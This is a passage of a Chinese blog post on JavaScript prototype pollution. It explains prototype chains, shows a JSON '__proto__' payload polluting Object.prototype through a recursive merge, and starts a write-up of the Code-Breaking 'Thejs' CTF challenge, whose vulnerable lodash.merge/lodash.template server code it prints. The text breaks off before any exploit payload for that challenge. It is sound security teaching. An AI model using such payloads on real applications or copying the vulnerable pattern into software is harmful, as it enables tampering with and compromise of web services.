
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>Prototype Pollution Attack | 离怀秋</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="原型与原型链javascript对象在Javascript中同样是有一切皆对象这种说法的，下面是在javascript中创建对象的三种方式">
<meta property="og:type" content="article">
<meta property="og:title" content="Prototype Pollution Attack">
<meta property="og:url" content="http://yoursite.com/2019/09/25/Prototype-Pollution-Attack/index.html">
<meta property="og:site_name" content="离怀秋">
<meta property="og:description" content="原型与原型链javascript对象在Javascript中同样是有一切皆对象这种说法的，下面是在javascript中创建对象的三种方式">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/16/nRFnk8.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/16/nRFRhD.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/16/nfdXRK.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/16/nfH5hq.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/16/nhtCr9.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/16/nhd2fx.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/16/nhBkOU.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/16/nhD33q.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/18/nTBWLt.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/18/nHXw0s.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/18/nbS1Rx.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/18/nbpfBD.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/18/nbpbgP.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/18/nb9BKf.png">
<meta property="article:published_time" content="2019-09-25T10:25:28.000Z">
<meta property="article:modified_time" content="2020-07-13T05:17:07.030Z">
<meta property="article:author" content="离怀秋">
<meta property="article:tag" content="Web安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.ax1x.com/2019/09/16/nRFnk8.png">
  
    <link rel="alternative" href="/atom.xml" title="离怀秋" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
<link rel="stylesheet" href="/css/style.css">

  <!--[if lt IE 9]><script src="//cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7/html5shiv.min.js"></script><![endif]-->
  
<meta name="generator" content="Hexo 4.2.1"></head>
<body>
<div id="container">
  <div id="wrap">
    <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">离怀秋</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
          <a class="main-nav-link" href="/about">About</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//www.baidu.com/baidu" method="get" accept-charset="utf-8" class="search-form">
          <input type="search" name="word" maxlength="20" class="search-form-input" placeholder="Search">
          <input type="submit" value="" class="search-form-submit">
          <input name=tn type=hidden value="bds">
          <input name=cl type=hidden value="3">
          <input name=ct type=hidden value="2097152">
          <input type="hidden" name="si" value="yoursite.com">
        </form>
      </div>
    </div>
  </div>
</header>
    <div class="outer">
      <section id="main"><article id="post-Prototype-Pollution-Attack" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2019/09/25/Prototype-Pollution-Attack/" class="article-date">
  <time datetime="2019-09-25T10:25:28.000Z" itemprop="datePublished">2019-09-25</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Prototype Pollution Attack
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h3 id="原型与原型链"><a href="#原型与原型链" class="headerlink" title="原型与原型链"></a>原型与原型链</h3><h4 id="javascript对象"><a href="#javascript对象" class="headerlink" title="javascript对象"></a>javascript对象</h4><p>在Javascript中同样是有一切皆对象这种说法的，下面是在javascript中创建对象的三种方式</p>
<a id="more"></a>

<ul>
<li>普通创建</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> person=&#123;<span class="attr">name</span>:<span class="string">'lihuaiqiu'</span>,<span class="string">'age'</span>,<span class="string">'19'</span>&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> person=&#123;&#125;  <span class="comment">//创建空对象</span></span><br></pre></td></tr></table></figure>

<ul>
<li>构造函数方法创建</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">person</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">this</span>.name=<span class="string">"liahuqiu"</span>;</span><br><span class="line">    <span class="keyword">this</span>.test=<span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">23333</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line">person.prototype.a=<span class="number">3</span>;</span><br><span class="line">web=<span class="keyword">new</span> person();</span><br><span class="line"><span class="built_in">console</span>.log(web.test());</span><br><span class="line"><span class="built_in">console</span>.log(web.a)</span><br></pre></td></tr></table></figure>

<ul>
<li>通过object创建</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> a=<span class="keyword">new</span> <span class="built_in">Object</span>();</span><br><span class="line">a.c=<span class="number">3</span></span><br><span class="line"><span class="built_in">console</span>.log(a.c)</span><br></pre></td></tr></table></figure>

<h4 id="函数即对象思想"><a href="#函数即对象思想" class="headerlink" title="函数即对象思想"></a>函数即对象思想</h4><p>这里用instanceof来判断很明显，首先用较为官方的语言来说明一下instanceof</p>
<blockquote>
<p>instanceof运算符可以用来判断某个构造函数的prototype属性是否存在另外一个要检测对象的原型链</p>
</blockquote>
<p>就像这样</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">My</span>(<span class="params"></span>)</span>&#123;&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">You</span>(<span class="params"></span>)</span>&#123;&#125;</span><br><span class="line">     </span><br><span class="line"><span class="keyword">var</span> myOne = <span class="keyword">new</span> My();</span><br><span class="line"><span class="built_in">console</span>.info(myOne <span class="keyword">instanceof</span> My)<span class="comment">//true //myone.__proto__===My.prototype</span></span><br><span class="line"><span class="built_in">console</span>.info(myOne <span class="keyword">instanceof</span> You)<span class="comment">//false</span></span><br></pre></td></tr></table></figure>

<p>那么就可以通过下面这样的代码去验证函数即对象了</p>
<p><img src="https://s2.ax1x.com/2019/09/16/nRFnk8.png" alt="nRFnk8.png"></p>
<p>由此可以test构造函数其实也是一种对象，即”函数即对象”。</p>
<p>那么函数与对象的属性有什么区别呢？csdn上有一个很好的图可以解释这个问题，如下:</p>
<p><img src="https://s2.ax1x.com/2019/09/16/nRFRhD.png" alt="nRFRhD.png"></p>
<p>函数既可作为对象去解释又可作为函数去解释。</p>
<h4 id="proto-，constructor与prototype"><a href="#proto-，constructor与prototype" class="headerlink" title="__proto__，constructor与prototype"></a>__proto__，constructor与prototype</h4><p>首先把这三个属性的基本概念列举出来</p>
<ul>
<li><p>__proto__： <em>\</em>proto__是对象与对象之间连接的桥梁，即原型链</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">对象.__proto__&#x3D;构造器(构造函数).prototype</span><br></pre></td></tr></table></figure>

<p>构造器.prototype其实也是一个对象，为构造函数的原型对象，同样有__proto__属性，一直通过原型链__proto__最终可找到null。</p>
<p>在访问一个对象的某个属性时,当属性在实例中找不到，就会在属性中的原型对象中寻找。</p>
</li>
<li><p>prototype：prototype为函数特有的属性，而通过构造函数实例化的对象，默认是没有的。</p>
</li>
</ul>
<p>构造函数.prototype即为此构造函数实例化的原型对象，即 构造器(构造函数).prototype=对象.<em>_proto_\</em></p>
<p>其实prototype主要作用为解决构造函数的对象实例之间无法共享属性的缺点,实例如下：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">test</span>(<span class="params"></span>)</span>&#123;&#125;</span><br><span class="line">test.prototype.a=<span class="function"><span class="keyword">function</span> <span class="title">num</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">666</span>;</span><br><span class="line">&#125;</span><br><span class="line">example1=<span class="keyword">new</span> test();</span><br><span class="line">example2=<span class="keyword">new</span> test();</span><br><span class="line"></span><br><span class="line"><span class="built_in">console</span>.log(example1.a);   <span class="comment">//[Function: num]</span></span><br><span class="line"><span class="built_in">console</span>.log(example2.a)    <span class="comment">//[Function: num]</span></span><br><span class="line"><span class="built_in">console</span>.log(example1.a===example2.a);   <span class="comment">//true</span></span><br></pre></td></tr></table></figure>

<ul>
<li>constructor：通过实例化对象.constructor即可得到该实例化对象的构造函数，实例如下：</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">Person</span>(<span class="params"></span>) </span>&#123;&#125;</span><br><span class="line"><span class="keyword">var</span> person1 = <span class="keyword">new</span> Person()</span><br><span class="line"><span class="keyword">var</span> person2 = <span class="keyword">new</span> Person()</span><br><span class="line"><span class="built_in">console</span>.log(person1.constructor) <span class="comment">//[Function: Person]</span></span><br><span class="line"><span class="built_in">console</span>.log(Person.prototype.constructor) <span class="comment">//[Function: Person] //Person的原型对象的构造函数即为Person</span></span><br></pre></td></tr></table></figure>

<p>之前介绍的函数即对象思想在这里就可以解释一些代码了</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">Person</span>(<span class="params"></span>) </span>&#123;&#125;</span><br><span class="line"><span class="built_in">console</span>.log(Person.constructor) <span class="comment">// [Function: Function]</span></span><br><span class="line"><span class="built_in">console</span>.log(<span class="built_in">Function</span>.constructor) <span class="comment">// [Function: Function]</span></span><br><span class="line"><span class="built_in">console</span>.log(<span class="built_in">Object</span>.constructor) <span class="comment">// [Function: Function]</span></span><br></pre></td></tr></table></figure>

<p>这四行代码说明了以下几点问题</p>
<ol>
<li>Funtion函数为Person函数的构造函数，这里就间接说明了函数即对象这个思想</li>
<li>Function函数同时也是自己的构造函数</li>
<li>Function函数同时为Object内置类的构造函数</li>
</ol>
<p><strong>所以，javascript中任意函数都是函数Function的实例对象，同时Function函数自身也为自己的实例对象</strong></p>
<h4 id="一些帮助理解的小例子"><a href="#一些帮助理解的小例子" class="headerlink" title="一些帮助理解的小例子"></a>一些帮助理解的小例子</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">Person</span>(<span class="params"></span>) </span>&#123;&#125;</span><br><span class="line"><span class="keyword">var</span> person1 = <span class="keyword">new</span> Person()</span><br><span class="line"><span class="built_in">console</span>.log(person1.constructor) <span class="comment">//[Function: Person]</span></span><br><span class="line"><span class="built_in">console</span>.log(Person.prototype.constructor) <span class="comment">//[Function: Person]</span></span><br><span class="line"><span class="built_in">console</span>.log(person1.__proto__===Person.prototype)</span><br><span class="line"><span class="built_in">console</span>.log(person1.__proto__.__proto__.constructor) <span class="comment">//[Function: Object]</span></span><br><span class="line"><span class="built_in">console</span>.log(person1.__proto__.__proto__==<span class="built_in">Object</span>.prototype) <span class="comment">//&#123;&#125;</span></span><br><span class="line"><span class="built_in">console</span>.log(person1.__proto__.__proto__.__proto__)  <span class="comment">//null</span></span><br></pre></td></tr></table></figure>

<p>来自csdn上的一个很棒的图片</p>
<p><img src="https://s2.ax1x.com/2019/09/16/nfdXRK.png" alt="nfdXRK.png"></p>
<h4 id="Object与Function"><a href="#Object与Function" class="headerlink" title="Object与Function"></a>Object与Function</h4><p><code>Object</code>/<code>Function</code>既是对象，有自己的方法和属性，也是函数，可以作为构造函数，或许可以称作所谓的构造函数(函数对象)</p>
<h5 id="Function"><a href="#Function" class="headerlink" title="Function"></a>Function</h5><p>Function相对来说是一个很特别的函数/对象</p>
<ul>
<li>一般函数函数的prototype属性为一个原型对象，而Function的prototype属性为一个函数对象</li>
<li>所有函数的本身的__proto__属性指向Function的原型对象，实例如下：</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">Person</span>(<span class="params"></span>) </span>&#123;&#125;</span><br><span class="line"><span class="built_in">console</span>.log(Person.__proto__===<span class="built_in">Function</span>.prototype)</span><br><span class="line"><span class="built_in">console</span>.log(<span class="built_in">Object</span>.__proto__===<span class="built_in">Function</span>.prototype)</span><br></pre></td></tr></table></figure>

<h5 id="Object"><a href="#Object" class="headerlink" title="Object"></a>Object</h5><ul>
<li>Object.prototype为所有对象原型链的终点且Object.prototype.__proto__为null</li>
</ul>
<p>一些帮助理解的小例子</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">Function</span>.__proto__ === <span class="built_in">Function</span>.prototype <span class="comment">// true </span></span><br><span class="line"><span class="built_in">Object</span>.__proto__ === <span class="built_in">Function</span>.prototype <span class="comment">// true</span></span><br><span class="line"><span class="built_in">Object</span>.prototype.__proto__ === <span class="literal">null</span> <span class="comment">// true</span></span><br><span class="line"><span class="built_in">Function</span>.prototype.__proto__ === <span class="built_in">Object</span>.prototype <span class="comment">// true</span></span><br><span class="line"><span class="built_in">Object</span>.prototype === <span class="built_in">Object</span>.__proto__ <span class="comment">// false</span></span><br><span class="line"><span class="built_in">console</span>.log(<span class="built_in">Object</span>.prototype) <span class="comment">// &#123;&#125;</span></span><br><span class="line"><span class="built_in">console</span>.log(<span class="built_in">Object</span>.__proto__) <span class="comment">// [Function]</span></span><br></pre></td></tr></table></figure>

<h4 id="普通对象与函数对象的一些区别"><a href="#普通对象与函数对象的一些区别" class="headerlink" title="普通对象与函数对象的一些区别"></a>普通对象与函数对象的一些区别</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> test=&#123;<span class="string">'name'</span>:<span class="string">'lihuaiqiu'</span>&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">Person</span>(<span class="params"></span>)</span>&#123;&#125;</span><br><span class="line"><span class="built_in">console</span>.log(test.__proto__===<span class="built_in">Object</span>.prototype)</span><br><span class="line"><span class="built_in">console</span>.log(Person.prototype.__proto__===<span class="built_in">Object</span>.prototype)</span><br></pre></td></tr></table></figure>

<p>从上例中可明显看出函数对象与普通对象的区别是中间差了一个prototype获取原型对象的过程。</p>
<h3 id="原型链污染"><a href="#原型链污染" class="headerlink" title="原型链污染"></a>原型链污染</h3><p>污染实例如下</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> test1=&#123;<span class="attr">a</span>:<span class="number">1</span>,<span class="attr">b</span>:<span class="number">2</span>&#125;</span><br><span class="line">test1.__proto__.c=<span class="number">3</span></span><br><span class="line"><span class="built_in">console</span>.log(test1.c) <span class="comment">//3</span></span><br><span class="line"><span class="keyword">var</span> test2=&#123;&#125;</span><br><span class="line"><span class="built_in">console</span>.log(test2.a) <span class="comment">//undefined</span></span><br><span class="line"><span class="built_in">console</span>.log(test2.c) <span class="comment">//3</span></span><br></pre></td></tr></table></figure>

<p>在上面的代码中我们并没有在test2对象中设置c变量，但是却成功的打印出了c这是为什么呢？</p>
<p>因为我们在test1.__proto__中也就是object.prototype(<strong>Object构造函数的原型链</strong>)中设置了c,那么访问test2.c的时候首先在这个对象中找不到，再去test2.__proto__去找(也就是<strong>Object构造函数的原型链</strong>中去找)，正好找到c变量即可正常数据，这个访问流程也就是对JS原型链的诠释，下面我们具体打印一下Object来看一下</p>
<p><a href="https://imgchr.com/i/nfH5hq" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/09/16/nfH5hq.png" alt="nfH5hq.png"></a></p>
<h3 id="原型链污染应用场景"><a href="#原型链污染应用场景" class="headerlink" title="原型链污染应用场景"></a>原型链污染应用场景</h3><p>这里用的是ph牛给的例子，在ph牛的文章中，有以下两个场景可能产生原型链污染</p>
<ul>
<li>对象merge</li>
<li>对象clone（其实内核就是将待操作的对象merge到一个空对象中）</li>
</ul>
<p>示例代码</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">merge</span>(<span class="params">target, source</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">let</span> key <span class="keyword">in</span> source) &#123;</span><br><span class="line">        <span class="keyword">if</span> (key <span class="keyword">in</span> source &amp;&amp; key <span class="keyword">in</span> target) &#123;</span><br><span class="line">            merge(target[key], source[key])</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            target[key] = source[key]</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">let</span> o1 = &#123;&#125;</span><br><span class="line"><span class="keyword">let</span> o2 = &#123;<span class="attr">a</span>: <span class="number">1</span>, <span class="string">"__proto__"</span>: &#123;<span class="attr">b</span>: <span class="number">2</span>&#125;&#125;</span><br><span class="line">merge(o1, o2)</span><br><span class="line"><span class="built_in">console</span>.log(o1.a, o1.b)</span><br><span class="line"></span><br><span class="line">o3 = &#123;&#125;</span><br><span class="line"><span class="built_in">console</span>.log(o3.b)</span><br></pre></td></tr></table></figure>

<p>这里本来的想法是通过o1.__proto__去操控Object.prototype进而污染o3，但是这个o2中的proto并没有被当作键值，可以打断点看一下</p>
<p><img src="https://s2.ax1x.com/2019/09/16/nhtCr9.png" alt="nhtCr9.png"></p>
<p>这个__proto__其实已经被当作原型对象了，不过在看这个的时候我发现o2其实也是有点意思的，实验如下：</p>
<p><img src="https://s2.ax1x.com/2019/09/16/nhd2fx.png" alt="nhd2fx.png"></p>
<p>这里我们可以看到其实这个a中设置的”键值”已经被当作了a的原型对象了，相当于我们自己定义的原型对象，正常情况下a.__proto__就可以去操作Object.prototype了，但是这里是需要两次__proto__的，我们来看一下正常键值下我们通过__proto__来操控Object.prototype的亚子</p>
<p><img src="https://s2.ax1x.com/2019/09/16/nhBkOU.png" alt="nhBkOU.png"></p>
<p>这样就很清晰的明白了在__proto__键值下为什么要通过两次__proto__才能去操作Object.prototype</p>
<p>所以在ph牛给的例子中我们的键值相当于自定义了一个原型对象，故没法在新的对象中添加__proto__键值，所以就没法进行原型链污染了。那么怎么才能进行原型链污染呢，ph牛同样给出了例子</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">let</span> o1 = &#123;&#125;</span><br><span class="line"><span class="keyword">let</span> o2 = <span class="built_in">JSON</span>.parse(<span class="string">'&#123;"a": 1, "__proto__": &#123;"b": 2&#125;&#125;'</span>)</span><br><span class="line">merge(o1, o2)</span><br><span class="line"><span class="built_in">console</span>.log(o1.a, o1.b)</span><br><span class="line"></span><br><span class="line">o3 = &#123;&#125;</span><br><span class="line"><span class="built_in">console</span>.log(o3.b)</span><br></pre></td></tr></table></figure>

<p>跟进分析一下</p>
<p><img src="https://s2.ax1x.com/2019/09/16/nhD33q.png" alt="nhD33q.png"></p>
<p>从上图我们可以看出来在merge之后成功触发原型链污染，成功修改Object.prototype造成对o3的污染。</p>
<p>那么我们可以清楚在JSON解析的情况下__proto__是会被当作键名的，而不再是类似之前那样被当作自己声明的原型了。</p>
<h3 id="Code-Breaking-Thejs"><a href="#Code-Breaking-Thejs" class="headerlink" title="Code-Breaking Thejs"></a>Code-Breaking Thejs</h3><p>主要部分代码如下</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> fs = <span class="built_in">require</span>(<span class="string">'fs'</span>)</span><br><span class="line"><span class="keyword">const</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>)</span><br><span class="line"><span class="keyword">const</span> bodyParser = <span class="built_in">require</span>(<span class="string">'body-parser'</span>)</span><br><span class="line"><span class="keyword">const</span> lodash = <span class="built_in">require</span>(<span class="string">'lodash'</span>)</span><br><span class="line"><span class="keyword">const</span> session = <span class="built_in">require</span>(<span class="string">'express-session'</span>)</span><br><span class="line"><span class="keyword">const</span> randomize = <span class="built_in">require</span>(<span class="string">'randomatic'</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> app = express()</span><br><span class="line">app.use(bodyParser.urlencoded(&#123;<span class="attr">extended</span>: <span class="literal">true</span>&#125;)).use(bodyParser.json()) <span class="comment">//处理JSON数据</span></span><br><span class="line">app.use(<span class="string">'/static'</span>, express.static(<span class="string">'static'</span>))</span><br><span class="line">app.use(session(&#123;</span><br><span class="line">    name: <span class="string">'thejs.session'</span>,</span><br><span class="line">    secret: randomize(<span class="string">'aA0'</span>, <span class="number">16</span>),</span><br><span class="line">    resave: <span class="literal">false</span>,</span><br><span class="line">    saveUninitialized: <span class="literal">false</span>     <span class="comment">//设置一下Session</span></span><br><span class="line">&#125;))</span><br><span class="line">app.engine(<span class="string">'ejs'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">filePath, options, callback</span>) </span>&#123; <span class="comment">// define the template engine</span></span><br><span class="line">    fs.readFile(filePath, (err, content) =&gt; &#123;</span><br><span class="line">        <span class="keyword">if</span> (err) <span class="keyword">return</span> callback(<span class="keyword">new</span> <span class="built_in">Error</span>(err)) <span class="comment">//调用ejs进行渲染</span></span><br><span class="line">        <span class="keyword">let</span> compiled = lodash.template(content) <span class="comment">//渲染内容</span></span><br><span class="line">        <span class="keyword">let</span> rendered = compiled(&#123;...options&#125;) <span class="comment">//动态引入成员变量</span></span><br><span class="line"></span><br><span class="line">​    <span class="keyword">return</span> callback(<span class="literal">null</span>, rendered) <span class="comment">//传回来</span></span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">&#125;)</span><br><span class="line">app.set(<span class="string">'views'</span>, <span class="string">'./views'</span>)</span><br><span class="line">app.set(<span class="string">'view engine'</span>, <span class="string">'ejs'</span>)</span><br><span class="line"></span><br><span class="line">app.all(<span class="string">'/'</span>, (req, res) =&gt; &#123;</span><br><span class="line">    <span class="keyword">let</span> data = req.session.data || &#123;<span class="attr">language</span>: [], <span class="attr">category</span>: []&#125;</span><br><span class="line">    <span class="keyword">if</span> (req.method == <span class="string">'POST'</span>) &#123;</span><br><span class="line">        data = lodash.merge(data, req.body)</span><br><span class="line">        req.session.data = data</span><br><span class="line">    &#125;    <span class="comment">//将body中的数据传入sessioN中</span></span><br><span class="line">    </span><br><span class="line"></span><br><span class="line">res.render(<span class="string">'index'</span>, &#123;</span><br><span class="line">    language: data.language, </span><br><span class="line">    category: data.category <span class="comment">//渲染自己的选择</span></span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">app.listen(<span class="number">3000</span>, () =&gt; <span class="built_in">console</span>.log(Example app listening on port <span class="number">3000</span>!))</span><br></pre></td></tr></table></figure>

<h4 id="程序主要逻辑分析"><a href="#程序主要逻辑分析" class="headerlink" title="程序主要逻辑分析"></a>程序主要逻辑分析</h4><p>我们通过两个选择框选择后这个框架会发生什么</p>
<p>首先判断请求方式是POST，然后进行下一步，通过lodash.merge，将我们body中的数值给data,然后session中储存这个data，这里也大概跟了一下lodash.merge，其原理应该就是正常的merge。</p>
<p>赋值完了之后进行渲染index,在渲染的适合，会跳到下面这个函数</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">  app.engine(<span class="string">'ejs'</span>, <span class="function"><span class="keyword">function</span> (<span class="params">filePath, options, callback</span>) </span>&#123; <span class="comment">// define the template engine</span></span><br><span class="line">    fs.readFile(filePath, (err, content) =&gt; &#123;</span><br><span class="line">        <span class="keyword">if</span> (err) <span class="keyword">return</span> callback(<span class="keyword">new</span> <span class="built_in">Error</span>(err))</span><br><span class="line">  	<span class="keyword">let</span> compiled = lodash.template(content)</span><br><span class="line">    <span class="keyword">let</span> rendered = compiled(&#123;...options&#125;)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> callback(<span class="literal">null</span>, rendered)</span><br><span class="line">&#125;)</span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>

<p>也就是说这个才是渲染的核心，首先读取index.ejs的内容作为content,然后传入template模板化，最后进行动态引入一些配置变量，我们可以把compiled和options截出来具体看一下</p>
<p><img src="https://s2.ax1x.com/2019/09/18/nTBWLt.png" alt="nTBWLt.png"></p>
<p>这样我们的rendered的值就是渲染后的界面了，最后callback返回给用户。</p>
<h4 id="漏洞点分析"><a href="#漏洞点分析" class="headerlink" title="漏洞点分析"></a>漏洞点分析</h4><h5 id="原型链污染点"><a href="#原型链污染点" class="headerlink" title="原型链污染点"></a>原型链污染点</h5><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">app.all(<span class="string">'/'</span>, (req, res) =&gt; &#123;</span><br><span class="line">    <span class="keyword">let</span> data = req.session.data || &#123;<span class="attr">language</span>: [], <span class="attr">category</span>: []&#125;</span><br><span class="line">    <span class="keyword">if</span> (req.method == <span class="string">'POST'</span>) &#123;</span><br><span class="line">        data = lodash.merge(data, req.body)</span><br><span class="line">        req.session.data = data</span><br><span class="line">    &#125;</span><br><span class="line">    